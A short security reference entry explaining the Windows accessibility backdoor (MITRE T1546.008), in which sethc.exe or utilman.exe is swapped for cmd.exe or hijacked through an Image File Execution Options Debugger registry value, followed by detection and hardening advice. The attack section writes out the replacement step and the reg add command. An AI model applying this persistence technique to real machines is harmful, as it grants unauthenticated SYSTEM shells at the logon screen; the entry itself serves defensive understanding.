An accessibility backdoor abuses Windows accessibility features that are reachable from the locked logon screen, such as Sticky Keys (sethc.exe) and the Utility Manager (utilman.exe), by replacing them (or hijacking their launch) so they open a SYSTEM command prompt instead. An attacker who triggers the feature at the login screen, for example pressing Shift five times, gets a SYSTEM shell without authenticating. It needs admin to set up and maps to MITRE T1546.008.
What it is
Windows lets you launch accessibility tools from the logon screen, before anyone signs in: Sticky Keys (sethc.exe, triggered by pressing Shift five times) and Utility Manager (utilman.exe, the ease-of-access button). These run as SYSTEM because no user is logged in yet.
An accessibility backdoor makes that helper launch `cmd.exe` instead, so the attacker gets a SYSTEM shell straight from the login screen.
The technique and payload
With admin (typically post-exploitation), the attacker repoints the accessibility binary:
- Replace the binary: overwrite
C:\Windows\System32\sethc.exewithcmd.exe, then press Shift five times at the logon screen for a SYSTEM prompt. - Or use Image File Execution Options to set a debugger:
reg add "HKLM\...\Image File Execution Options\sethc.exe" /v Debugger /d "cmd.exe", no file replacement needed. - The same works with
utilman.exe,osk.exe, and others.
Works even over RDP at the lock screen. Documented for defensive context.
How to defend
- Monitor the accessibility binaries (
sethc.exe,utilman.exe,osk.exe) for replacement, and the Image File Execution Options keys for aDebuggervalue. - Enable file integrity monitoring on System32 for these files.
- Restrict RDP and use Network Level Authentication so the lock screen is not exposed.
- Limit local admin, required to set the backdoor.
- Alert on cmd.exe or shells spawned by these binaries.
References
- [1]MITRE ATT&CK: Event Triggered Execution (T1546)(MITRE)
- [2]Microsoft: Windows logon and security(Microsoft)
- [3]MITRE ATT&CK: Persistence (TA0003)(MITRE)